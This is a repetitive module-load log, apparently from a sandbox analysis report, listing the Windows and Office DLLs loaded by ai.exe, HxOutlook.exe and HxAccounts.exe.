                      Source: C:\Program Files (x86)\Microsoft Office\root\vfs\ProgramFilesCommonX64\Microsoft Shared\Office16\ai.exeSection loaded: c2r64.dll
                      Source: C:\Program Files (x86)\Microsoft Office\root\vfs\ProgramFilesCommonX64\Microsoft Shared\Office16\ai.exeSection loaded: userenv.dll
                      Source: C:\Program Files (x86)\Microsoft Office\root\vfs\ProgramFilesCommonX64\Microsoft Shared\Office16\ai.exeSection loaded: msasn1.dll
                      Source: C:\Program Files (x86)\Microsoft Office\root\vfs\ProgramFilesCommonX64\Microsoft Shared\Office16\ai.exeSection loaded: kernel.appcore.dll
                      Source: C:\Program Files (x86)\Microsoft Office\root\vfs\ProgramFilesCommonX64\Microsoft Shared\Office16\ai.exeSection loaded: cryptsp.dll
                      Source: C:\Program Files (x86)\Microsoft Office\root\vfs\ProgramFilesCommonX64\Microsoft Shared\Office16\ai.exeSection loaded: rsaenh.dll
                      Source: C:\Program Files (x86)\Microsoft Office\root\vfs\ProgramFilesCommonX64\Microsoft Shared\Office16\ai.exeSection loaded: cryptbase.dll
                      Source: C:\Program Files (x86)\Microsoft Office\root\vfs\ProgramFilesCommonX64\Microsoft Shared\Office16\ai.exeSection loaded: gpapi.dll
                      Source: C:\Program Files\WindowsApps\microsoft.windowscommunicationsapps_16005.11629.20316.0_x64__8wekyb3d8bbwe\HxOutlook.exeSection loaded: apphelp.dll
                      Source: C:\Program Files\WindowsApps\microsoft.windowscommunicationsapps_16005.11629.20316.0_x64__8wekyb3d8bbwe\HxOutlook.exeSection loaded: microsoft.applications.telemetry.windows.dll
                      Source: C:\Program Files\WindowsApps\microsoft.windowscommunicationsapps_16005.11629.20316.0_x64__8wekyb3d8bbwe\HxOutlook.exeSection loaded: msoimm.dll
                      Source: C:\Program Files\WindowsApps\microsoft.windowscommunicationsapps_16005.11629.20316.0_x64__8wekyb3d8bbwe\HxOutlook.exeSection loaded: mso40uiimm.dll
                      Source: C:\Program Files\WindowsApps\microsoft.windowscommunicationsapps_16005.11629.20316.0_x64__8wekyb3d8bbwe\HxOutlook.exeSection loaded: mso30imm.dll
                      Source: C:\Program Files\WindowsApps\microsoft.windowscommunicationsapps_16005.11629.20316.0_x64__8wekyb3d8bbwe\HxOutlook.exeSection loaded: mso20imm.dll
                      Source: C:\Program Files\WindowsApps\microsoft.windowscommunicationsapps_16005.11629.20316.0_x64__8wekyb3d8bbwe\HxOutlook.exeSection loaded: office.ui.xaml.core.dll
                      Source: C:\Program Files\WindowsApps\microsoft.windowscommunicationsapps_16005.11629.20316.0_x64__8wekyb3d8bbwe\HxOutlook.exeSection loaded: office.ui.xaml.word.dll
                      Source: C:\Program Files\WindowsApps\microsoft.windowscommunicationsapps_16005.11629.20316.0_x64__8wekyb3d8bbwe\HxOutlook.exeSection loaded: vccorlib140_app.dll
                      Source: C:\Program Files\WindowsApps\microsoft.windowscommunicationsapps_16005.11629.20316.0_x64__8wekyb3d8bbwe\HxOutlook.exeSection loaded: vcruntime140_app.dll
                      Source: C:\Program Files\WindowsApps\microsoft.windowscommunicationsapps_16005.11629.20316.0_x64__8wekyb3d8bbwe\HxOutlook.exeSection loaded: msvcp140_app.dll
                      Source: C:\Program Files\WindowsApps\microsoft.windowscommunicationsapps_16005.11629.20316.0_x64__8wekyb3d8bbwe\HxOutlook.exeSection loaded: vccorlib140_app.dll
                      Source: C:\Program Files\WindowsApps\microsoft.windowscommunicationsapps_16005.11629.20316.0_x64__8wekyb3d8bbwe\HxOutlook.exeSection loaded: msvcp140_app.dll
                      Source: C:\Program Files\WindowsApps\microsoft.windowscommunicationsapps_16005.11629.20316.0_x64__8wekyb3d8bbwe\HxOutlook.exeSection loaded: vcruntime140_app.dll
                      Source: C:\Program Files\WindowsApps\microsoft.windowscommunicationsapps_16005.11629.20316.0_x64__8wekyb3d8bbwe\HxOutlook.exeSection loaded: vccorlib140_app.dll
                      Source: C:\Program Files\WindowsApps\microsoft.windowscommunicationsapps_16005.11629.20316.0_x64__8wekyb3d8bbwe\HxOutlook.exeSection loaded: vcruntime140_app.dll
                      Source: C:\Program Files\WindowsApps\microsoft.windowscommunicationsapps_16005.11629.20316.0_x64__8wekyb3d8bbwe\HxOutlook.exeSection loaded: msvcp140_app.dll
                      Source: C:\Program Files\WindowsApps\microsoft.windowscommunicationsapps_16005.11629.20316.0_x64__8wekyb3d8bbwe\HxOutlook.exeSection loaded: vcruntime140_app.dll
                      Source: C:\Program Files\WindowsApps\microsoft.windowscommunicationsapps_16005.11629.20316.0_x64__8wekyb3d8bbwe\HxOutlook.exeSection loaded: msvcp140_app.dll
                      Source: C:\Program Files\WindowsApps\microsoft.windowscommunicationsapps_16005.11629.20316.0_x64__8wekyb3d8bbwe\HxOutlook.exeSection loaded: vcruntime140_app.dll
                      Source: C:\Program Files\WindowsApps\microsoft.windowscommunicationsapps_16005.11629.20316.0_x64__8wekyb3d8bbwe\HxOutlook.exeSection loaded: msvcp140_app.dll
                      Source: C:\Program Files\WindowsApps\microsoft.windowscommunicationsapps_16005.11629.20316.0_x64__8wekyb3d8bbwe\HxOutlook.exeSection loaded: vcruntime140_app.dll
                      Source: C:\Program Files\WindowsApps\microsoft.windowscommunicationsapps_16005.11629.20316.0_x64__8wekyb3d8bbwe\HxOutlook.exeSection loaded: msvcp140_app.dll
                      Source: C:\Program Files\WindowsApps\microsoft.windowscommunicationsapps_16005.11629.20316.0_x64__8wekyb3d8bbwe\HxOutlook.exeSection loaded: mso98imm.dll
                      Source: C:\Program Files\WindowsApps\microsoft.windowscommunicationsapps_16005.11629.20316.0_x64__8wekyb3d8bbwe\HxOutlook.exeSection loaded: mso50imm.dll
                      Source: C:\Program Files\WindowsApps\microsoft.windowscommunicationsapps_16005.11629.20316.0_x64__8wekyb3d8bbwe\HxOutlook.exeSection loaded: mso98imm.dll
                      Source: C:\Program Files\WindowsApps\microsoft.windowscommunicationsapps_16005.11629.20316.0_x64__8wekyb3d8bbwe\HxOutlook.exeSection loaded: kernel.appcore.dll
                      Source: C:\Program Files\WindowsApps\microsoft.windowscommunicationsapps_16005.11629.20316.0_x64__8wekyb3d8bbwe\HxOutlook.exeSection loaded: hxoutlook.model.dll
                      Source: C:\Program Files\WindowsApps\microsoft.windowscommunicationsapps_16005.11629.20316.0_x64__8wekyb3d8bbwe\HxOutlook.exeSection loaded: windows.storage.applicationdata.dll
                      Source: C:\Program Files\WindowsApps\microsoft.windowscommunicationsapps_16005.11629.20316.0_x64__8wekyb3d8bbwe\HxOutlook.exeSection loaded: twinapi.appcore.dll
                      Source: C:\Program Files\WindowsApps\microsoft.windowscommunicationsapps_16005.11629.20316.0_x64__8wekyb3d8bbwe\HxOutlook.exeSection loaded: wintypes.dll
                      Source: C:\Program Files\WindowsApps\microsoft.windowscommunicationsapps_16005.11629.20316.0_x64__8wekyb3d8bbwe\HxOutlook.exeSection loaded: hxcomm.dll
                      Source: C:\Program Files\WindowsApps\microsoft.windowscommunicationsapps_16005.11629.20316.0_x64__8wekyb3d8bbwe\HxOutlook.exeSection loaded: cryptsp.dll
                      Source: C:\Program Files\WindowsApps\microsoft.windowscommunicationsapps_16005.11629.20316.0_x64__8wekyb3d8bbwe\HxOutlook.exeSection loaded: windows.applicationmodel.dll
                      Source: C:\Program Files\WindowsApps\microsoft.windowscommunicationsapps_16005.11629.20316.0_x64__8wekyb3d8bbwe\HxOutlook.exeSection loaded: windows.globalization.dll
                      Source: C:\Program Files\WindowsApps\microsoft.windowscommunicationsapps_16005.11629.20316.0_x64__8wekyb3d8bbwe\HxOutlook.exeSection loaded: bcp47langs.dll
                      Source: C:\Program Files\WindowsApps\microsoft.windowscommunicationsapps_16005.11629.20316.0_x64__8wekyb3d8bbwe\HxOutlook.exeSection loaded: bcp47mrm.dll
                      Source: C:\Program Files\WindowsApps\microsoft.windowscommunicationsapps_16005.11629.20316.0_x64__8wekyb3d8bbwe\HxOutlook.exeSection loaded: onecorecommonproxystub.dll
                      Source: C:\Program Files\WindowsApps\microsoft.windowscommunicationsapps_16005.11629.20316.0_x64__8wekyb3d8bbwe\HxOutlook.exeSection loaded: profapi.dll
                      Source: C:\Program Files\WindowsApps\microsoft.windowscommunicationsapps_16005.11629.20316.0_x64__8wekyb3d8bbwe\HxOutlook.exeSection loaded: windows.staterepositorycore.dll
                      Source: C:\Program Files\WindowsApps\microsoft.windowscommunicationsapps_16005.11629.20316.0_x64__8wekyb3d8bbwe\HxOutlook.exeSection loaded: windows.networking.connectivity.dll
                      Source: C:\Program Files\WindowsApps\microsoft.windowscommunicationsapps_16005.11629.20316.0_x64__8wekyb3d8bbwe\HxOutlook.exeSection loaded: windows.networking.hostname.dll
                      Source: C:\Program Files\WindowsApps\microsoft.windowscommunicationsapps_16005.11629.20316.0_x64__8wekyb3d8bbwe\HxOutlook.exeSection loaded: windows.energy.dll
                      Source: C:\Program Files\WindowsApps\microsoft.windowscommunicationsapps_16005.11629.20316.0_x64__8wekyb3d8bbwe\HxOutlook.exeSection loaded: rmclient.dll
                      Source: C:\Program Files\WindowsApps\microsoft.windowscommunicationsapps_16005.11629.20316.0_x64__8wekyb3d8bbwe\HxOutlook.exeSection loaded: windows.storage.dll
                      Source: C:\Program Files\WindowsApps\microsoft.windowscommunicationsapps_16005.11629.20316.0_x64__8wekyb3d8bbwe\HxOutlook.exeSection loaded: wldp.dll
                      Source: C:\Program Files\WindowsApps\microsoft.windowscommunicationsapps_16005.11629.20316.0_x64__8wekyb3d8bbwe\HxOutlook.exeSection loaded: propsys.dll
                      Source: C:\Program Files\WindowsApps\microsoft.windowscommunicationsapps_16005.11629.20316.0_x64__8wekyb3d8bbwe\HxOutlook.exeSection loaded: rometadata.dll
                      Source: C:\Program Files\WindowsApps\microsoft.windowscommunicationsapps_16005.11629.20316.0_x64__8wekyb3d8bbwe\HxOutlook.exeSection loaded: windows.system.diagnostics.telemetry.platformtelemetryclient.dll
                      Source: C:\Program Files\WindowsApps\microsoft.windowscommunicationsapps_16005.11629.20316.0_x64__8wekyb3d8bbwe\HxOutlook.exeSection loaded: hxoutlook.view.dll
                      Source: C:\Program Files\WindowsApps\microsoft.windowscommunicationsapps_16005.11629.20316.0_x64__8wekyb3d8bbwe\HxOutlook.exeSection loaded: office.ui.xaml.hxshared.dll
                      Source: C:\Program Files\WindowsApps\microsoft.windowscommunicationsapps_16005.11629.20316.0_x64__8wekyb3d8bbwe\HxOutlook.exeSection loaded: hxoutlook.viewmodel.dll
                      Source: C:\Program Files\WindowsApps\microsoft.windowscommunicationsapps_16005.11629.20316.0_x64__8wekyb3d8bbwe\HxOutlook.exeSection loaded: clipc.dll
                      Source: C:\Program Files\WindowsApps\microsoft.windowscommunicationsapps_16005.11629.20316.0_x64__8wekyb3d8bbwe\HxOutlook.exeSection loaded: hxoutlook.resources.dll
                      Source: C:\Program Files\WindowsApps\microsoft.windowscommunicationsapps_16005.11629.20316.0_x64__8wekyb3d8bbwe\HxOutlook.exeSection loaded: logoncli.dll
                      Source: C:\Program Files\WindowsApps\microsoft.windowscommunicationsapps_16005.11629.20316.0_x64__8wekyb3d8bbwe\HxOutlook.exeSection loaded: windows.ui.xaml.dll
                      Source: C:\Program Files\WindowsApps\microsoft.windowscommunicationsapps_16005.11629.20316.0_x64__8wekyb3d8bbwe\HxOutlook.exeSection loaded: coremessaging.dll
                      Source: C:\Program Files\WindowsApps\microsoft.windowscommunicationsapps_16005.11629.20316.0_x64__8wekyb3d8bbwe\HxOutlook.exeSection loaded: iertutil.dll
                      Source: C:\Program Files\WindowsApps\microsoft.windowscommunicationsapps_16005.11629.20316.0_x64__8wekyb3d8bbwe\HxOutlook.exeSection loaded: dcomp.dll
                      Source: C:\Program Files\WindowsApps\microsoft.windowscommunicationsapps_16005.11629.20316.0_x64__8wekyb3d8bbwe\HxOutlook.exeSection loaded: windows.ui.dll
                      Source: C:\Program Files\WindowsApps\microsoft.windowscommunicationsapps_16005.11629.20316.0_x64__8wekyb3d8bbwe\HxOutlook.exeSection loaded: windowmanagementapi.dll
                      Source: C:\Program Files\WindowsApps\microsoft.windowscommunicationsapps_16005.11629.20316.0_x64__8wekyb3d8bbwe\HxOutlook.exeSection loaded: textinputframework.dll
                      Source: C:\Program Files\WindowsApps\microsoft.windowscommunicationsapps_16005.11629.20316.0_x64__8wekyb3d8bbwe\HxOutlook.exeSection loaded: inputhost.dll
                      Source: C:\Program Files\WindowsApps\microsoft.windowscommunicationsapps_16005.11629.20316.0_x64__8wekyb3d8bbwe\HxOutlook.exeSection loaded: coreuicomponents.dll
                      Source: C:\Program Files\WindowsApps\microsoft.windowscommunicationsapps_16005.11629.20316.0_x64__8wekyb3d8bbwe\HxOutlook.exeSection loaded: coreuicomponents.dll
                      Source: C:\Program Files\WindowsApps\microsoft.windowscommunicationsapps_16005.11629.20316.0_x64__8wekyb3d8bbwe\HxOutlook.exeSection loaded: ntmarta.dll
                      Source: C:\Program Files\WindowsApps\microsoft.windowscommunicationsapps_16005.11629.20316.0_x64__8wekyb3d8bbwe\HxOutlook.exeSection loaded: onecoreuapcommonproxystub.dll
                      Source: C:\Program Files\WindowsApps\microsoft.windowscommunicationsapps_16005.11629.20316.0_x64__8wekyb3d8bbwe\HxOutlook.exeSection loaded: uxtheme.dll
                      Source: C:\Program Files\WindowsApps\microsoft.windowscommunicationsapps_16005.11629.20316.0_x64__8wekyb3d8bbwe\HxOutlook.exeSection loaded: urlmon.dll
                      Source: C:\Program Files\WindowsApps\microsoft.windowscommunicationsapps_16005.11629.20316.0_x64__8wekyb3d8bbwe\HxOutlook.exeSection loaded: srvcli.dll
                      Source: C:\Program Files\WindowsApps\microsoft.windowscommunicationsapps_16005.11629.20316.0_x64__8wekyb3d8bbwe\HxOutlook.exeSection loaded: netutils.dll
                      Source: C:\Program Files\WindowsApps\microsoft.windowscommunicationsapps_16005.11629.20316.0_x64__8wekyb3d8bbwe\HxOutlook.exeSection loaded: dxgi.dll
                      Source: C:\Program Files\WindowsApps\microsoft.windowscommunicationsapps_16005.11629.20316.0_x64__8wekyb3d8bbwe\HxOutlook.exeSection loaded: resourcepolicyclient.dll
                      Source: C:\Program Files\WindowsApps\microsoft.windowscommunicationsapps_16005.11629.20316.0_x64__8wekyb3d8bbwe\HxOutlook.exeSection loaded: mrmcorer.dll
                      Source: C:\Program Files\WindowsApps\microsoft.windowscommunicationsapps_16005.11629.20316.0_x64__8wekyb3d8bbwe\HxOutlook.exeSection loaded: d3d11.dll
                      Source: C:\Program Files\WindowsApps\microsoft.windowscommunicationsapps_16005.11629.20316.0_x64__8wekyb3d8bbwe\HxOutlook.exeSection loaded: windows.staterepositoryclient.dll
                      Source: C:\Program Files\WindowsApps\microsoft.windowscommunicationsapps_16005.11629.20316.0_x64__8wekyb3d8bbwe\HxOutlook.exeSection loaded: d3d10warp.dll
                      Source: C:\Program Files\WindowsApps\microsoft.windowscommunicationsapps_16005.11629.20316.0_x64__8wekyb3d8bbwe\HxOutlook.exeSection loaded: dxcore.dll
                      Source: C:\Program Files\WindowsApps\microsoft.windowscommunicationsapps_16005.11629.20316.0_x64__8wekyb3d8bbwe\HxOutlook.exeSection loaded: d2d1.dll
                      Source: C:\Program Files\WindowsApps\microsoft.windowscommunicationsapps_16005.11629.20316.0_x64__8wekyb3d8bbwe\HxOutlook.exeSection loaded: dwrite.dll
                      Source: C:\Program Files\WindowsApps\microsoft.windowscommunicationsapps_16005.11629.20316.0_x64__8wekyb3d8bbwe\HxOutlook.exeSection loaded: textshaping.dll
                      Source: C:\Program Files\WindowsApps\microsoft.windowscommunicationsapps_16005.11629.20316.0_x64__8wekyb3d8bbwe\HxOutlook.exeSection loaded: windows.shell.servicehostbuilder.dll
                      Source: C:\Program Files\WindowsApps\microsoft.windowscommunicationsapps_16005.11629.20316.0_x64__8wekyb3d8bbwe\HxOutlook.exeSection loaded: execmodelproxy.dll
                      Source: C:\Program Files\WindowsApps\microsoft.windowscommunicationsapps_16005.11629.20316.0_x64__8wekyb3d8bbwe\HxOutlook.exeSection loaded: uiamanager.dll
                      Source: C:\Program Files\WindowsApps\microsoft.windowscommunicationsapps_16005.11629.20316.0_x64__8wekyb3d8bbwe\HxOutlook.exeSection loaded: windows.ui.core.textinput.dll
                      Source: C:\Program Files\WindowsApps\microsoft.windowscommunicationsapps_16005.11629.20316.0_x64__8wekyb3d8bbwe\HxOutlook.exeSection loaded: windows.ui.immersive.dll
                      Source: C:\Program Files\WindowsApps\microsoft.windowscommunicationsapps_16005.11629.20316.0_x64__8wekyb3d8bbwe\HxOutlook.exeSection loaded: dataexchange.dll
                      Source: C:\Program Files\WindowsApps\microsoft.windowscommunicationsapps_16005.11629.20316.0_x64__8wekyb3d8bbwe\HxOutlook.exeSection loaded: cryptbase.dll
                      Source: C:\Program Files\WindowsApps\microsoft.windowscommunicationsapps_16005.11629.20316.0_x64__8wekyb3d8bbwe\HxOutlook.exeSection loaded: userenv.dll
                      Source: C:\Program Files\WindowsApps\microsoft.windowscommunicationsapps_16005.11629.20316.0_x64__8wekyb3d8bbwe\HxOutlook.exeSection loaded: profext.dll
                      Source: C:\Program Files\WindowsApps\microsoft.windowscommunicationsapps_16005.11629.20316.0_x64__8wekyb3d8bbwe\HxOutlook.exeSection loaded: office.ui.xaml.hx.mail.dll
                      Source: C:\Program Files\WindowsApps\microsoft.windowscommunicationsapps_16005.11629.20316.0_x64__8wekyb3d8bbwe\HxOutlook.exeSection loaded: threadpoolwinrt.dll
                      Source: C:\Program Files\WindowsApps\microsoft.windowscommunicationsapps_16005.11629.20316.0_x64__8wekyb3d8bbwe\HxOutlook.exeSection loaded: windows.graphics.dll
                      Source: C:\Program Files\WindowsApps\microsoft.windowscommunicationsapps_16005.11629.20316.0_x64__8wekyb3d8bbwe\HxOutlook.exeSection loaded: twinapi.dll
                      Source: C:\Program Files\WindowsApps\microsoft.windowscommunicationsapps_16005.11629.20316.0_x64__8wekyb3d8bbwe\HxOutlook.exeSection loaded: office.ui.xaml.hxcalendar.dll
                      Source: C:\Program Files\WindowsApps\microsoft.windowscommunicationsapps_16005.11629.20316.0_x64__8wekyb3d8bbwe\HxOutlook.exeSection loaded: windows.ui.xaml.controls.dll
                      Source: C:\Program Files\WindowsApps\microsoft.windowscommunicationsapps_16005.11629.20316.0_x64__8wekyb3d8bbwe\HxOutlook.exeSection loaded: windows.system.remotedesktop.dll
                      Source: C:\Program Files\WindowsApps\microsoft.windowscommunicationsapps_16005.11629.20316.0_x64__8wekyb3d8bbwe\HxOutlook.exeSection loaded: winsta.dll
                      Source: C:\Program Files\WindowsApps\microsoft.windowscommunicationsapps_16005.11629.20316.0_x64__8wekyb3d8bbwe\HxOutlook.exeSection loaded: directmanipulation.dll
                      Source: C:\Program Files\WindowsApps\microsoft.windowscommunicationsapps_16005.11629.20316.0_x64__8wekyb3d8bbwe\HxOutlook.exeSection loaded: windows.system.profile.systemid.dll
                      Source: C:\Program Files\WindowsApps\microsoft.windowscommunicationsapps_16005.11629.20316.0_x64__8wekyb3d8bbwe\HxOutlook.exeSection loaded: windows.system.profile.retailinfo.dll
                      Source: C:\Program Files\WindowsApps\microsoft.windowscommunicationsapps_16005.11629.20316.0_x64__8wekyb3d8bbwe\HxOutlook.exeSection loaded: msxml6.dll
                      Source: C:\Program Files\WindowsApps\microsoft.windowscommunicationsapps_16005.11629.20316.0_x64__8wekyb3d8bbwe\HxOutlook.exeSection loaded: wininet.dll
                      Source: C:\Program Files\WindowsApps\microsoft.windowscommunicationsapps_16005.11629.20316.0_x64__8wekyb3d8bbwe\HxOutlook.exeSection loaded: sspicli.dll
                      Source: C:\Program Files\WindowsApps\microsoft.windowscommunicationsapps_16005.11629.20316.0_x64__8wekyb3d8bbwe\HxOutlook.exeSection loaded: ondemandconnroutehelper.dll
                      Source: C:\Program Files\WindowsApps\microsoft.windowscommunicationsapps_16005.11629.20316.0_x64__8wekyb3d8bbwe\HxOutlook.exeSection loaded: winhttp.dll
                      Source: C:\Program Files\WindowsApps\microsoft.windowscommunicationsapps_16005.11629.20316.0_x64__8wekyb3d8bbwe\HxOutlook.exeSection loaded: mswsock.dll
                      Source: C:\Program Files\WindowsApps\microsoft.windowscommunicationsapps_16005.11629.20316.0_x64__8wekyb3d8bbwe\HxOutlook.exeSection loaded: winrttracing.dll
                      Source: C:\Program Files\WindowsApps\microsoft.windowscommunicationsapps_16005.11629.20316.0_x64__8wekyb3d8bbwe\HxOutlook.exeSection loaded: iphlpapi.dll
                      Source: C:\Program Files\WindowsApps\microsoft.windowscommunicationsapps_16005.11629.20316.0_x64__8wekyb3d8bbwe\HxOutlook.exeSection loaded: winnsi.dll
                      Source: C:\Program Files\WindowsApps\microsoft.windowscommunicationsapps_16005.11629.20316.0_x64__8wekyb3d8bbwe\HxOutlook.exeSection loaded: dnsapi.dll
                      Source: C:\Program Files\WindowsApps\microsoft.windowscommunicationsapps_16005.11629.20316.0_x64__8wekyb3d8bbwe\HxOutlook.exeSection loaded: rasadhlp.dll
                      Source: C:\Program Files\WindowsApps\microsoft.windowscommunicationsapps_16005.11629.20316.0_x64__8wekyb3d8bbwe\HxOutlook.exeSection loaded: fwpuclnt.dll
                      Source: C:\Program Files\WindowsApps\microsoft.windowscommunicationsapps_16005.11629.20316.0_x64__8wekyb3d8bbwe\HxOutlook.exeSection loaded: schannel.dll
                      Source: C:\Program Files\WindowsApps\microsoft.windowscommunicationsapps_16005.11629.20316.0_x64__8wekyb3d8bbwe\HxOutlook.exeSection loaded: windows.staterepositoryps.dll
                      Source: C:\Program Files\WindowsApps\microsoft.windowscommunicationsapps_16005.11629.20316.0_x64__8wekyb3d8bbwe\HxOutlook.exeSection loaded: windowscodecs.dll
                      Source: C:\Program Files\WindowsApps\microsoft.windowscommunicationsapps_16005.11629.20316.0_x64__8wekyb3d8bbwe\HxOutlook.exeSection loaded: photometadatahandler.dll
                      Source: C:\Program Files\WindowsApps\microsoft.windowscommunicationsapps_16005.11629.20316.0_x64__8wekyb3d8bbwe\HxOutlook.exeSection loaded: ploptin.dll
                      Source: C:\Program Files\WindowsApps\microsoft.windowscommunicationsapps_16005.11629.20316.0_x64__8wekyb3d8bbwe\HxOutlook.exeSection loaded: dwmapi.dll
                      Source: C:\Program Files\WindowsApps\microsoft.windowscommunicationsapps_16005.11629.20316.0_x64__8wekyb3d8bbwe\HxOutlook.exeSection loaded: mskeyprotect.dll
                      Source: C:\Program Files\WindowsApps\microsoft.windowscommunicationsapps_16005.11629.20316.0_x64__8wekyb3d8bbwe\HxOutlook.exeSection loaded: ntasn1.dll
                      Source: C:\Program Files\WindowsApps\microsoft.windowscommunicationsapps_16005.11629.20316.0_x64__8wekyb3d8bbwe\HxOutlook.exeSection loaded: ncrypt.dll
                      Source: C:\Program Files\WindowsApps\microsoft.windowscommunicationsapps_16005.11629.20316.0_x64__8wekyb3d8bbwe\HxOutlook.exeSection loaded: ncryptsslp.dll
                      Source: C:\Program Files\WindowsApps\microsoft.windowscommunicationsapps_16005.11629.20316.0_x64__8wekyb3d8bbwe\HxOutlook.exeSection loaded: msasn1.dll
                      Source: C:\Program Files\WindowsApps\microsoft.windowscommunicationsapps_16005.11629.20316.0_x64__8wekyb3d8bbwe\HxOutlook.exeSection loaded: dpapi.dll
                      Source: C:\Program Files\WindowsApps\microsoft.windowscommunicationsapps_16005.11629.20316.0_x64__8wekyb3d8bbwe\HxOutlook.exeSection loaded: rsaenh.dll
                      Source: C:\Program Files\WindowsApps\microsoft.windowscommunicationsapps_16005.11629.20316.0_x64__8wekyb3d8bbwe\HxOutlook.exeSection loaded: gpapi.dll
                      Source: C:\Program Files\WindowsApps\microsoft.windowscommunicationsapps_16005.11629.20316.0_x64__8wekyb3d8bbwe\HxOutlook.exeSection loaded: userdataaccountapis.dll
                      Source: C:\Program Files\WindowsApps\microsoft.windowscommunicationsapps_16005.11629.20316.0_x64__8wekyb3d8bbwe\HxOutlook.exeSection loaded: userdataplatformhelperutil.dll
                      Source: C:\Program Files\WindowsApps\microsoft.windowscommunicationsapps_16005.11629.20316.0_x64__8wekyb3d8bbwe\HxOutlook.exeSection loaded: windows.accountscontrol.dll
                      Source: C:\Program Files\WindowsApps\microsoft.windowscommunicationsapps_16005.11629.20316.0_x64__8wekyb3d8bbwe\HxOutlook.exeSection loaded: xmllite.dll
                      Source: C:\Program Files\WindowsApps\microsoft.windowscommunicationsapps_16005.11629.20316.0_x64__8wekyb3d8bbwe\HxOutlook.exeSection loaded: accountsrt.dll
                      Source: C:\Program Files\WindowsApps\microsoft.windowscommunicationsapps_16005.11629.20316.0_x64__8wekyb3d8bbwe\HxOutlook.exeSection loaded: aphostclient.dll
                      Source: C:\Program Files\WindowsApps\microsoft.windowscommunicationsapps_16005.11629.20316.0_x64__8wekyb3d8bbwe\HxOutlook.exeSection loaded: webservices.dll
                      Source: C:\Program Files\WindowsApps\microsoft.windowscommunicationsapps_16005.11629.20316.0_x64__8wekyb3d8bbwe\HxOutlook.exeSection loaded: execmodelclient.dll
                      Source: C:\Program Files\WindowsApps\microsoft.windowscommunicationsapps_16005.11629.20316.0_x64__8wekyb3d8bbwe\HxAccounts.exeSection loaded: apphelp.dll
                      Source: C:\Program Files\WindowsApps\microsoft.windowscommunicationsapps_16005.11629.20316.0_x64__8wekyb3d8bbwe\HxAccounts.exeSection loaded: hxoutlook.model.dll
                      Source: C:\Program Files\WindowsApps\microsoft.windowscommunicationsapps_16005.11629.20316.0_x64__8wekyb3d8bbwe\HxAccounts.exeSection loaded: microsoft.applications.telemetry.windows.dll
                      Source: C:\Program Files\WindowsApps\microsoft.windowscommunicationsapps_16005.11629.20316.0_x64__8wekyb3d8bbwe\HxAccounts.exeSection loaded: mso20imm.dll
                      Source: C:\Program Files\WindowsApps\microsoft.windowscommunicationsapps_16005.11629.20316.0_x64__8wekyb3d8bbwe\HxAccounts.exeSection loaded: vccorlib140_app.dll
                      Source: C:\Program Files\WindowsApps\microsoft.windowscommunicationsapps_16005.11629.20316.0_x64__8wekyb3d8bbwe\HxAccounts.exeSection loaded: vcruntime140_app.dll
                      Source: C:\Program Files\WindowsApps\microsoft.windowscommunicationsapps_16005.11629.20316.0_x64__8wekyb3d8bbwe\HxAccounts.exeSection loaded: msvcp140_app.dll
                      Source: C:\Program Files\WindowsApps\microsoft.windowscommunicationsapps_16005.11629.20316.0_x64__8wekyb3d8bbwe\HxAccounts.exeSection loaded: vcruntime140_app.dll
                      Source: C:\Program Files\WindowsApps\microsoft.windowscommunicationsapps_16005.11629.20316.0_x64__8wekyb3d8bbwe\HxAccounts.exeSection loaded: msvcp140_app.dll
                      Source: C:\Program Files\WindowsApps\microsoft.windowscommunicationsapps_16005.11629.20316.0_x64__8wekyb3d8bbwe\HxAccounts.exeSection loaded: msvcp140_app.dll
                      Source: C:\Program Files\WindowsApps\microsoft.windowscommunicationsapps_16005.11629.20316.0_x64__8wekyb3d8bbwe\HxAccounts.exeSection loaded: mso30imm.dll
                      Source: C:\Program Files\WindowsApps\microsoft.windowscommunicationsapps_16005.11629.20316.0_x64__8wekyb3d8bbwe\HxAccounts.exeSection loaded: msvcp140_app.dll
                      Source: C:\Program Files\WindowsApps\microsoft.windowscommunicationsapps_16005.11629.20316.0_x64__8wekyb3d8bbwe\HxAccounts.exeSection loaded: kernel.appcore.dll
                      Source: C:\Program Files\WindowsApps\microsoft.windowscommunicationsapps_16005.11629.20316.0_x64__8wekyb3d8bbwe\HxAccounts.exeSection loaded: windows.ui.xaml.dll
                      Source: C:\Program Files\WindowsApps\microsoft.windowscommunicationsapps_16005.11629.20316.0_x64__8wekyb3d8bbwe\HxAccounts.exeSection loaded: coremessaging.dll
                      Source: C:\Program Files\WindowsApps\microsoft.windowscommunicationsapps_16005.11629.20316.0_x64__8wekyb3d8bbwe\HxAccounts.exeSection loaded: bcp47langs.dll
                      Source: C:\Program Files\WindowsApps\microsoft.windowscommunicationsapps_16005.11629.20316.0_x64__8wekyb3d8bbwe\HxAccounts.exeSection loaded: iertutil.dll
                      Source: C:\Program Files\WindowsApps\microsoft.windowscommunicationsapps_16005.11629.20316.0_x64__8wekyb3d8bbwe\HxAccounts.exeSection loaded: dcomp.dll
                      Source: C:\Program Files\WindowsApps\microsoft.windowscommunicationsapps_16005.11629.20316.0_x64__8wekyb3d8bbwe\HxAccounts.exeSection loaded: twinapi.appcore.dll
                      Source: C:\Program Files\WindowsApps\microsoft.windowscommunicationsapps_16005.11629.20316.0_x64__8wekyb3d8bbwe\HxAccounts.exeSection loaded: wintypes.dll
                      Source: C:\Program Files\WindowsApps\microsoft.windowscommunicationsapps_16005.11629.20316.0_x64__8wekyb3d8bbwe\HxAccounts.exeSection loaded: windows.staterepositorycore.dll
                      Source: C:\Program Files\WindowsApps\microsoft.windowscommunicationsapps_16005.11629.20316.0_x64__8wekyb3d8bbwe\HxAccounts.exeSection loaded: windows.ui.dll
                      Source: C:\Program Files\WindowsApps\microsoft.windowscommunicationsapps_16005.11629.20316.0_x64__8wekyb3d8bbwe\HxAccounts.exeSection loaded: windowmanagementapi.dll
                      Source: C:\Program Files\WindowsApps\microsoft.windowscommunicationsapps_16005.11629.20316.0_x64__8wekyb3d8bbwe\HxAccounts.exeSection loaded: textinputframework.dll
                      Source: C:\Program Files\WindowsApps\microsoft.windowscommunicationsapps_16005.11629.20316.0_x64__8wekyb3d8bbwe\HxAccounts.exeSection loaded: inputhost.dll
                      Source: C:\Program Files\WindowsApps\microsoft.windowscommunicationsapps_16005.11629.20316.0_x64__8wekyb3d8bbwe\HxAccounts.exeSection loaded: coreuicomponents.dll
                      Source: C:\Program Files\WindowsApps\microsoft.windowscommunicationsapps_16005.11629.20316.0_x64__8wekyb3d8bbwe\HxAccounts.exeSection loaded: propsys.dll
